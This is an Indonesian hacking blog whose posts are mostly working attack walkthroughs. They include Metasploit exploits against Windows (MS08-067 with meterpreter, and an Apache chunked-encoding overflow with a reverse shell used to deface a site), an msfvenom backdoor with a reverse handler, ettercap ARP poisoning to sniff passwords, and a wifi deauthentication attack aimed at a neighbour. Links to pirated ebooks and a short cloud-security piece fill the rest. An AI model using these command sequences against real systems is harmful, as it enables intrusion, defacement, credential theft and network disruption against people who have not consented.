X-Steel - Wait

Social Icons

Friday, 29 August 2014

Pemetaan jaringan Blackberry phone

Inilah cara membajak atau hack pin BB (Blackberry) dengan mudah. google trik - trik cara membuat id blackberry tanpa menggunakan bbm id atau tanpa kita punya hp blackberry tapi kita bisa menggunakan blackberry messenger bisakan atau itu hanya bualan semata? temukan jawabanya sebentar lagi karena saya akan mencoba menjawab sebisa mungkin dengan pemahaman dann pengetahuan saya yang minmalis ini hehe...
setelah saya browsing saya menemukan artikel yang cukup menarik dengan judulTernyata blackberry juga mungkin untuk di hack maka setelah saya baca postingan tersebut saya menyimpulakan ternyata bb ada kemungkinan bisa di hack tapi untuk cara dan triknya saya juga kurang faham mau tahu isi postinganya seperti apa?
Karena menurut beberapa ahli bahwa salah satu kelemahan sekaligus kekuatan Blackberry adalah adanya feature “proxying” yang hampir ada pada setiap device dari RIM ini, yang mana hampir secara keseluruhan layananan Blackberry baik itu e-mail (pushmail), browsing baik dari dan menuju perangkat Blackberry kita melalui server Blackberry (untuk kawasan ASIA PASIFIK) server berada ap.blackberry.com
diagram

Saturday, 23 August 2014

Ebook IT

Learning Pentesting for Android Devices (2014)
HowTo Download: http://www.youtube.com/watch?v=b2rqK4qPFu4
Download for free: http://go.iexplo1t.com/5556016/learnpentest4android

Seven Deadliest Web Application Attacks:
http://flexydrive.com/55qylbzpa6nz

Advanced Linux Programming
http://www.advancedlinuxprogramming.com/alp-folder/

ANDROID SECUIRTY
https://www.dropbox.com/s/lsu5ah1w1njacqc/ANDROID%20SECUIRTY.epub12
EBOOK PEMROGRAMAN VISUAL DI LINUX
http://malsasa.files.wordpress.com/2013/10/pengantar-pemrograman-gui-di-linux.pdf

Pemrograman Qt
1 - Perkenalan Hard Coding:
http://malsasa.files.wordpress.com/2013/09/pemrograman-qt-1-e28093-membuat-dialog-groupbox-layout-dan-tombol-dengan-menulis-kode-bukan-designer.pdf

2 - Mengenal Layout Sederhana:
http://malsasa.files.wordpress.com/2013/09/pemrograman-qt-2-e28093-mendayagunakan-qgroupbox-dan-qhboxlayout-untuk-membentuk-kolom-dalam-qdialog.pdf

3 - QFrame dan QVBoxLayout:
http://malsasa.files.wordpress.com/2013/09/pemrograman-qt-3-e28093-mendayagunakan-qframe-dan-qvboxlayout-untuk-membentuk-kolom-lebih-banyak-dalam-qdialog.pdf4 -

Window Layering:
http://malsasa.files.wordpress.com/2013/09/pemrograman-qt-4-e28093-qstackedlayout-dan-qcombobox-untuk-window-layering.pdf

5 - Window Layering II:
http://malsasa.files.wordpress.com/2013/09/pemrograman-qt-5-e28093-qstackedlayout-dan-qpushbutton-untuk-layering-setcurrentindex.pdf

Exploit Windows 8

Selamat Malam Minggu sahabat Exploiter sepertinya pembaca sudah bosan dengan exploit windows xp1,2,3 dan lain-lain.. kali ini saya mencoba membagikan cara mengexploit windows 8 menggunakan  celah java applet
lets go....!!!
use multi/browser/java_signed_applet
set SRVPORT (setting port korban yang terbuka). gunakan nmap untuk scanning.
set Urlpath (path url yang akan kita berikan ke target)
exploit
Ternyata target sudah membuka pintu gerbangnya dan saya masuk ke systemnya :D

Thadoct0r Wordlist Creator

thad0ctor merupakan wordlist toolkit,,,yang berguna untuk memanipulasi,membuat.dan memodifikasi daftar kata-kata....thadoct0r dirancang untuk mengetest keakuratan dan kekuatan password yang telah dibuat dengan metode bruteforce toolkit ini didesign untuk berjalan di distro keluarga ubuntu.....thad0ctor juga terus diupdate guna menghasilkan tool yang sempurna
Apa saja fitur-fitur dari wordlist ini???:

Mampu mengolah kata-kata untuk SSNs,No.tlp,Rentang Tanggal, Pola Acak,sandi,pola,kata-kata dari PDF/ebook file, dapat memanipulasi daftar kata dengan mengubah kasus karakter,penggandaan kata-kata,membalikkan awalan kata.menambah urutan angka/karakter,mengubah kata-kata dengan setiap 1337 kata-kata. menetapkan panjang dan pendeknya kata2,menghapus kata-kata yang gak penting, menyortir kata-kata melalui penggabungan yang padat dan terpola,menyesuaikan kata-kata yang sering digunakan,pencarian string dan substring
toolsnya bisa di download thad0ctor
Unzip filenya:

Ingat thod0ctor hanya bisa dijalankan di dir Desktop so ketikkan ;
ls
./LAUNCH_TOOLKIT.sh
Mengecek apa saja depedencies yang dibutuhkan tool thad0ctor
Setelah kita install dependencies tadi maka dia minta pengupdatetan command : y
Silahkan Pilih salah satu Option dibawah
Selamat Bereksperimen Bro!!!  sumber.

Deteksi Peretas Di Jaringan

Apakah anda seorang admin jaringan,pernahkah anda berfikir didalam jaringan anda ada seorang penyusup atau akan melakukan tindakan yang tak diinginkan didalam jaringan anda.... jadi mari kita scan atau deteksi jaringan kita disini saya menggunakan KALI LINUX:

Application->Backtrack->Informaton Gathering->Network Analys->Network Scanner->AutoScan
Klik Forward:













Setting Konfigurasi:


















Pilih Localhost:


















PIlih Network card(kartu jaringan): Disini saya sedikit suram teman-teman karena saya menggunakan modem,jadi teman2 yang menggunakan mikrotik dll.... gunakan Eth0

















Klik Forward:


















Disini saya mengampil capture dari sahabat saya untuk hasil akhirnya 
untuk mendeteksi peretas klik intrusion alert and yes.













Bobol System Windows Menggunakan Kali linux

  1. Topologinya seperti ini,yang saya tes di jaringan lokal2 aja dlu.
  2. Ping komputer target (rhost), dan scan port2 yang terbuka di windows. Dan terlihat port 135 terbuka (awal yang baik).
    root@bt:/# nmap ipKomputerTarget
    .......
    root@bt:/# msfconsole

  3. Setelah masuk ke menu exploit maka akan muncuk tampilan berikut
    Kemudian ketiikan show exploits, untuk menampilkan daftar2 exploit yang ada di Backtrack (jangan salah, database exploit ini juga dapat diupdate).
    msf >
    show exploits
    Cari dilist tersebut windows/smb/ms_067_netapi
    msf > use windows/smb/ms08_067_netapi
    msf exploit(windows/smb/ms08_067_netapi) > show payloads
    Cari file payloads yang bernama windows/meterpreter/bind_tcp (seperti pada gambar Dibawah ini)
  4. Setelah file exploit tersebut ditemukan,lanjutkan prosesnya seperti berikut.
    msf exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
    msf exploit(windows/smb/ms08_067_netapi) > set lhost ipPcUser
    msf exploit(windows/smb/ms08_067_netapi) > set rhost ipPcTarget
    msf exploit(windows/smb/ms08_067_netapi) > exploit
    Jika muncul seperti gambar diatas, berarti exploit ke PC target berhasil.
    Selanjutnya terserah kita, mau diapakankah PC target tersebut (Ingat etika hacker).
  5. Sebagai contoh, saya akan masuk command promp-nya windows
    meterpreter >
    execute -f cmd.exe -c -i
    Pada gambar diatas, sudah terlihat kita sudah masuk command di windows.
  6. Misal saya menjalankan notepad.exe atau mstsc.exe atau program lain, di PC user korban, tidak terlihat menjalankan aplikasi apapun.
  7. Berikut screenshoot dari komputer target.
    Semua Ini Hanyalah Pembelajaran.....Jangan di gunakan untuk merusak atau meneror komputer orang lain,,,ingat etika Hacker....!!!!!!!! Source : Here

Defacing Menggunakan Metasploit Di Kali Linux

  1. Seperti biasa, masuk console aja. Next ketik msfconsole
    root@bt:/# msfconsole
  1. Setelah agak lama masuk juga di msfconsole, kemudian ketik show exploits
    msf > show exploits

    Metasploit Framework Loaded Exploits
    ====================================
    Credits Metasploit Framework Credits

    afp_loginext AppleFileServer LoginExt PathName Buffer Overflow
    apache_chunked_win32 Apache Win32 Chunked Encoding
    blackice_pam_icq ISS PAM.dll ICQ Parser Buffer Overflow
    distcc_exec DistCC Daemon Command Execution
    exchange2000_xexch50 Exchange 2000 MS03-46 Heap Overflow
    frontpage_fp30reg_chunked Frontpage fp30reg.dll Chunked Encoding
    ia_webmail IA WebMail 3.x Buffer Overflow
    iis50_nsiislog_post IIS 5.0 nsiislog.dll POST Overflow
    iis50_printer_overflow IIS 5.0 Printer Buffer Overflow
    iis50_webdav_ntdll IIS 5.0 WebDAV ntdll.dll Overflow


    Jadi disini kita bisa melihat daftar exploit pada Metasploit. salah satu yang akan kita gunakan adalah exploit nomor 2 dari atas, yakni: apache_chunked_win32
  2. Lanjut dengan pake salah satu exploit diatas
    msf > use apache_chunked_win32
    msf apache_chunked_win32 >
  3. Sebagaimana yang terlihat pada prompt akan berubah menjadi msf apache_chunked_win32> dengan prompt ini kita dapat melihat berbagai opsi exploit jenis ini, silakan ketik perintah dibawah ini:
    msf apache_chunked_win32 > show options

    Exploit Options
    ===============
    Exploit: Name Default Description
    -------- ------ ------- ------------------
    optional SSL Use SSL
    required RHOST The target address
    required RPORT 80 The target port
    Target: Windows NT/2K Brute Force

    msf apache_chunked_win32 >
  4. Sekarang kita balik ke prompt semula, dan daftar opsi yang kita perlu isi seperti remote host IP address target, seperti contoh dibawah ini :
    msf apache_chunked_win32 > set RHOST 192.168.1.101
    RHOST -> 192.168.1.101
    msf apache_chunked_win32 >
  5. Disini kita dapat melihat berbagai opsi yang kita perlukan sebelum menggunakan exploit ini guna mendapatkan akses tingkat sistem. Dalam kasus ini saya menggunakan perintah berikut untuk melihat apakah opsi payloads bisa digunakan?

    msf apache_chunked_win32 > show payloads

    Metasploit Framework Usable Payloads
    ====================================
    win32_bind Windows Bind Shell
    win32_bind_dllinject Windows Bind DLL Inject
    win32_bind_stg Windows Staged Bind Shell
    win32_bind_stg_upexec Windows Staged Bind Upload/Execute
    win32_bind_vncinject Windows Bind VNC Server DLL Inject
    win32_reverse Windows Reverse Shell
    win32_reverse_dllinject Windows Reverse DLL Inject
    win32_reverse_stg Windows Staged Reverse Shell
    win32_reverse_stg_ie Windows Reverse InlineEgg Stager
    win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
    win32_reverse_vncinject Windows Reverse VNC Server DLL Inject
    msf apache_chunked_win32 >


    Opsi ini merupakan bagian dari Metasploit Framework, yang memungkinkan anda menggunakan “egg” apapun yang anda pilih. Egg disini adalah apapun payload yang akan anda eksekusi pada komputer korban. Pilihan ini merupakan hal umum dalam penggunaan security tool.
  6. Dari apa yang kita lihat diatas ada suatu kelebihan dari opsi yang ada pada kami. Dalam kasus ini kita akan menggunakan win32_reverse payload. Mengapa? baiklah kita menginginkan shell yang bisa kita gunakan untuk mengangkut materi bolak-balik. Tepatnya kita ingin meng-copy file index.html, dan membuat beberapa modifikasi alias Deface. Hanya dengan shell itulah kita dapat melakukannya. Harap diperhatikan bahwa kita perlu memberitahu Framework tersebut bahwa kita ingin opsi payload tersebut. Berikut ini syntax-nya:

    msf apache_chunked_win32 > set PAYLOAD win32_reverse
    PAYLOAD -> win32_reverse
    msf apache_chunked_win32(win32_reverse) >
  7. Jadi kita sekarang telah menentukan payload dan telah menjadi prompt dibelakangnya. Apa selanjutnya? Hmm… kita perlu menentukan IP address untuk menerima reverse shell tersebut. Ingatlah kembali beberapa langkah sebelumnya saat kita mengeset RHOST untuk menentukan mesin korban? Kita juga perlu melakukan hal yang sama untuk menentukan receiving host. Silakan lihat perintahnya dibawah ini:

    msf apache_chunked_win32(win32_reverse) > set LHOST 192.168.1.102
    LHOST -> 192.168.1.102
    msf apache_chunked_win32(win32_reverse) >
  8. Sekarang saatnya kita menjalankan exploit. Syntaknya adalah sebagai berikut:

    msf apache_chunked_win32(win32_reverse) > exploit 192.168.1.101
    Starting Reverse Handler.
    Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 348...
    Trying to exploit Windows NT using return 0x1c0f1022 with padding of 348...
    Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 352...
    Trying to exploit Windows NT using return 0x1c0f1022 with padding of 352...
    Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 356...
    Trying to exploit Windows NT using return 0x1c0f1022 with padding of 356...
    Trying to exploit Windows 2000 using return 0x1c0f143c with padding of 360...
    Got connection from 192.168.1.101:1031

    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.

    C:\Program Files\Apache Group\Apache>
  9. Nah Kita sudah Masuk tuh Ke shell webservernya target........
    kita mau apain aja terserah.....


    Gunakan Pelajaran ini untuk kebaikan,,,,bukan untuk keisengan,kebencian ataupun kesenangan,,,,!!!

ETTERCAP DI KALI LINUX

sekarang udah ga usah pake script segala untuk sniffing password https seperti gmail, yahoo, facebook dll
cukup dengan menjalankan ettercap saja
Code:
root@bt:~# ettercap -T -q -M arp -i wlan0 // //
begini hasilnya??

==>>
root@bt:~# ettercap -T -q -M arp -i wlan0 // //

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on wlan0... (Ethernet)

wlan0 -> 00:22:FA:20:B3:8E 172.16.40.251 255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

254 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : ANY (all the hosts in the list)

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

DHCP: [1C:65:9D:26:C1:31] REQUEST 172.16.40.65
DHCP: [00:17:C4C:C33] REQUEST 172.16.40.217
DHCP: [00:1F:3C:A0:8F:4E] DISCOVER
DHCP: [00:1F:3C:A0:8F:4E] DISCOVER
DHCP: [00:1F:3C:A0:8F:4E] DISCOVER
DHCP: [00:1F:3C:A0:8F:4E] REQUEST 172.16.40.248
DHCP: [84:A8:E4:462:3B] DISCOVER
DHCP: [172.16.40.1] OFFER : 172.16.40.245 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1
DHCP: [172.16.40.1] ACK : 172.16.40.245 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1
DHCP: [84:A8:E4:462:3B] REQUEST 172.16.40.245
DHCP: [68:A3:C4:26:77:C7] REQUEST 172.16.40.140
DHCP: [00:21:00:74:21:49] REQUEST 172.16.40.113
DHCP: [172.16.40.1] ACK : 172.16.40.113 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1
DHCP: [68:A3:C4:26:77:C7] REQUEST 172.16.40.140

yang saya warnain biru itu harus diedit om biar jadi 0
caranya:

root@bt:~# nano /etc/etter.conf

Code:
############################################################################
#                                                                          #
#  ettercap -- etter.conf -- configuration file                            #
#                                                                          #
#  Copyright (C) ALoR & NaGA                                               #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
#  $Id: etter.conf,v 1.78 2004/10/12 15:28:38 alor Exp $                   #
#                                                                          #
############################################################################

[privs]
ec_uid = 0                # nobody is the default
ec_gid = 0                # nobody is the default



#####################################
#       redir_command_on/off
#####################################

#---------------
#     Linux
#---------------

# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

#---------------

silahkan edit ettercapnya seperti diatas lalu save.

Perintah-perintah Iwconfig di Kali linux


ketikkan perintah...
airmon-ng stop wifi0 --> untuk mematikan wifi
airmon-ng start wifi0 --> untuk mengaktifkan wifi
kemudian...
airodump-ng wifi0 --> untuk melihat aktivitas jaringan hampir mirip dengan C&A
setelah terlihat maka terserah mau ngapain...  
kalo mau perang"an... =0>^^ 
airodump-ng --channel 6 --bssid 00:21:27:E8:AF:16 -w hasil wifi0
channel 6 tergantung channel yang terlihat pada konsole dan sesuai dengan sid'nya kemudian disimpan ke dalam file hasil
juga untuk menampilkan ip,mac,bssid,packet dan sebagainya secara detail
kalo mau cari gara" sama tetangga...  
aireplay-ng --deauth 100000 -c 00:1C:BF:06:08:07 -a 00:21:27:E8:AF:16 wifi0
-c untuk memasukkan bssid client, kemudian -a masukkan bssid router
# iwconfig [interface] mode master
Menjadikan kartu PCMCIA dalam mode akses poin
# iwconfig [interface] mode managed
Menjadikan kartu PCMCIA Anda dalam mode client pada jaringan wifi infrastruktur
# iwconfig [interface] mode ad-hoc
Mengeset kartu Anda sebagai anggota di jaringan wifi ad hoc tanpa akses poin
# iwconfig [interface] mode monitor
Mengeset kartu Anda dalam mode monitor
# iwconfig [interface] essid “SSID_Anda”
Konfigurasikan ESSID jaringan Anda.
# iwconfig [interface] key 1111-1111-1111-1111
Mengeset kunci WEP 128bit
# iwconfig [interface] key 11111111
Mengeset kunci WEP 65 bit
# iwconfig [interface] key off
Menonaktifkan kunci WEP
# iwconfig [interface] key open
Menset sebagai open mode, tidak diperlukan autentikasi
# iwconfig [interface] channel [channel no.]
Menset sebuah channel 1-14
# iwconfig [interface] channel auto
Memilih channel otomatis
# iwconfig [interface] freq 2.422G
Menset channel dalam Ghz
# iwconfig [interface] ap 11:11:11:11:11:11
Memaksa kartu untuk mendaftar ke alamat AP
# iwconfig [interface] rate 11M
Kartu akan menggunakan kecepatan tertentu
# iwconfig [interface] rate auto
Memilih kecepatan otomatis
# iwconfig [interface] rate auto 5.5M
Kartu akan menggunakan kecepatan tertentu dan kecepatan di bawahnya jika memang perlu.

Seputar Cloud Computing

Layanan cloud computing atau komputasi awan termasuk baru diperkenalkan di Indonesia, untuk itulah diperlukan edukasi ke pengguna lokal, termasuk untuk mengantisipasi kekhawatiran tentang masalah keamanan dan privasi data.
National Technology Officer PT Microsoft Indonesia, igor p.k, menjelaskan bahwa faktor keamanan dan privasi menjadi dua dari empat isu terpenting seputar implementasi Cloud Computing di Indonesia, selain masalah keterbatasan akses internet dan keberadaan data itu sendiri.
“Jeleknya pengetahuan orang tentang keamanan di Internet menghantui adopsi Cloud Computing. Selain itu juga orang merasa lebih aman menyimpan data di komputer sendiri daripada di cloud. Padahal kenyataannya, data di cloud bisa jadi jauh lebih aman daripada data tersimpan di komputer sendiri,” jelasnya, seperti dilansir melalui keterangan resminya, Rabu (26/10/2011).
Data bisa dipastikan lebih aman karena ada aturan yang mengharuskan setiap penyelenggara layanan Cloud Computing untuk patuh terhadap regulasi dan aturan yang terkait. Sebagai contoh, ISO 27002 yang merupakan standar praktik terbaik pada keamanan informasi yang bisa juga digunakan untuk menilai tingkat keamanan di suatu penyedia jasa layanan Cloud Computing.
Selain kekhawatiran akan faktor keamanan, privasi juga menjadi isu yang menjadi perhatian Microsoft. “Era social media mengubah kebiasaan orang dalam menangani privasi. Privasi menjadi sangat penting di Cloud Computing, karena tingkat privasi yang diinginkan setiap orang berbeda-beda. Dengan kemampuan privasi data, maka setiap orang bisa menentukan siapa yang berhak mengakses atau mengubah suatu informasi berdasarkan identifikasi digital.
Keuntungan utama dari komputasi awan adalah kita bisa menyewa kemampuan komputasi tersebut sesuai dengan kebutuhan. Tidak ada kebutuhan bagi kita untuk membeli dan memasang komputer/server sendiri.
Komputasi awan bukanlah solusi untuk semua masalah TI, tetapi merupakan satu komponen dari satu solusi TI yang lengkap, yang biasanya merupakan gabungan dari layanan awan ditambah dengan aplikasi yang terpasang di server milik sendiri,” jelas Tony Seno.
Komputasi awan bukanlah teknologi baru, tetapi merupakan satu tahapan evolusi komputasi yang natural melalui beberapa era. Komputasi awan merupakan perwujudan dari demokratisasi teknologi, di mana teknologi sekarang terjangkau untuk siapapun, karena layanan komputasi awan tersedia mulai dari yang gratis sampai berbayar.
Kalau kita berlangganan komputasi awan ibaratnya seperti kita berlangganan air bersih dari PAM (Perusahaan Air Minum), di mana kita tidak perlu menggali sumur sendiri, memiliki dan merawat pompa air sendiri, dan membayar listriknya. Kita tinggal mengambil air bersih sesuai dengan kebutuhan dan membayar iuran bulanan ke PAM,” demikian jelasnya.
Aspek Keamanan dan Privasi Komputasi AwanSebelum suatu perusahaan/organisasi mendapatkan keuntungan dari komputasi awan, ada beberapa aspek yang berkaitan dengan Keamanan dan Privasi di bawah ini yang harus diperhatikan :


1. Manajemen Resiko dan Ketaatan, organisasi yang mulai mengadopsi awan tetap harus bertanggung jawab untuk aspek manajemen keamanan, resiko, dan ketaatan terhadap aturan yang berlaku di industri terkait. Manajemen resiko dan ketaatan ini membutuhkan tim internal yang kuat dan transparansi proses dari penyedia jasa awan. 
Rekomendasi : penyedia jasa awan harus menggunakan beberapa framework atau best practice seperti MOF, atau ITIL, dan memiliki sertifikasi seperti ISO/IEC 27001:2005, dan mempublikasikan laporan audit ke SAS 70 type II. Selain itu juga, disesuaikan dengan ketentuan suatu negara, mungkin juga harus taat terhadap PCI atau FISMA.


2. Manajemen Akses dan Identitas, identitas bisa didapat melalui beberapa penyedia jasa awan, dan harus bersifat interoperabel antar organisasi yang berbeda, penyedia awan yang berbeda, dan berlandaskan proses yang kuat. 
Rekomendasi : Autentikasi yang disarankan adalah menggunakan beberapa faktor sekaligus, seperti biometric, one time password token (seperti token BCA), kartu ID dengan chip, dan password.


3. Integritas Layanan, layanan berbasis awan harus dibangun dengan landasan keamanan yang kuat, dan proses-proses operasionalnya juga harus diintegrasikan dengan manajemen keamanan di organisasi tersebut. Penyedia layanan awan harus mengikuti proses yang bisa dibuktikan, terdefinisi, dan jelas dalam mengintegrasikan keamanan dan privasi ke dalam layanannya mulai dari titik paling awal, di setiap titik di dalam siklus, sampai paling penghabisan. Selain itu manajemen keamanan dan auditing harus selaras antara penyedia awan dan pelanggan.
Rekomendasi : Gunakan sertifikasi semacam EAL4+ (untuk evaluasi keamanan), SDL (untuk pengembangan aplikasi), ISO/IEC 18044 (untuk incident response).


4. Integritas Klien, layanan awan yang digunakan di sisi klien harus memperhatikan aspek keamanan, ketaatan, dan integritas di sisi klien. Integritas klien bisa ditingkatkan dengan menggunakan paduan praktek terbaik. 
Rekomendasi : Perkuat sistem desktop, pastikan kesehatan sistem desktop, terapkan IT policy yang tepat, federasi identitas, Network Access Protection dan sebagainya.


5. Proteksi Informasi, layanan awan membutuhkan proses yang andal untuk melindungi informasi sebelum, selama, dan setelah transaksi. Manfaatkan Klasifikasi Data untuk meningkatkan kontrol terhadap data yang siap dilepas ke awan. 


Rekomendasi : Gunakan teknologi enkripsi dan manajemen hak informasi (IRM) sebelum data dilepas ke awan.

Exploit Windows 8 Mengunakan Backdoor Msfvenom

Selamat datang di idris-spy malam ini masih galau dengan seseorang disana,, hatinya sudah saya exploit dengan kata-kata cinta sebagai backdoornya...tapi sayangnya dia belum membuka sesi meterpreternya.... well kali ini saya akan mengexploit windows 8 lagi :D  Setelah tadi saya membuat cara Exploit Windows 8 Menggunakan Java Signed Applet kali ini kita akan menggunan msfvenom untuk membuat backdoor....dan dihandle sessionya menggunakan msfconsole
msfvenom help = msfvenom -h 
  Cek dan ricek ternyata port defaultnya yg digunkan port 4444
dan saya membuat backdoor menggunakan encoder shikata ga nai,bad charcter,iterations (jumlah encode payload) dan menggunakan port 445.
Senjata saya sudah terpaketkan yang sewaktu-waktu akan meledak dihatimu
(Hasil Perintah diatas adalah
  Dini saya menggunakan handler reverse tcp untuk memastikan korban telah mengesekusi backdoor saya dengan port 445 sebagai gembok rumahnya :d
 dan ternyata dia sudah menerima saya sebagai pacarnya :D i love u shanty
 shanty hatimu baru sebaru windows 8 :D 
 

Tutorial WebSecurify


Websecurify Merupakan tools pentesting web yang sudah terinstall di Backtrack 5 R3...Tool ini mampu mengumpulkan informasi tentang web target seperti potensi serangan xss,injection, email gathering,info patch system. Websecurify juga didukung oleh banyak Operating System (linux,unix,windows,Iphone,Mac OS,Android.
Letaknya di Backtrack-->Eksploitation Tools-->Web Exploitation Tools-->Websecurify
Klik bagian HOME pojok kiri atas
Setelah Memasukkan nama web tekan enter dan ada warning centang Continue
Biarkan Scanning berjalan sampai 100 %, jika sudah selesai KLik tanda paling bawah 
Hasil scanning CrossRequest Forgery berserta solusi pathnya
Path disclosure berisi penjelasan cara attacker memanfaatkan celah dan cara mengatasinya
IP disclosure hampir sama penjelasan diatas berisi penjelasan dan solusi 
Eror Disclosure mendeteksi eror didaam system web dan solusinya
Email Disclosure Menampilkan email  web....
Banner Disclosure menampilkan Server yang digunakan
Sekian Dan Terima Kasih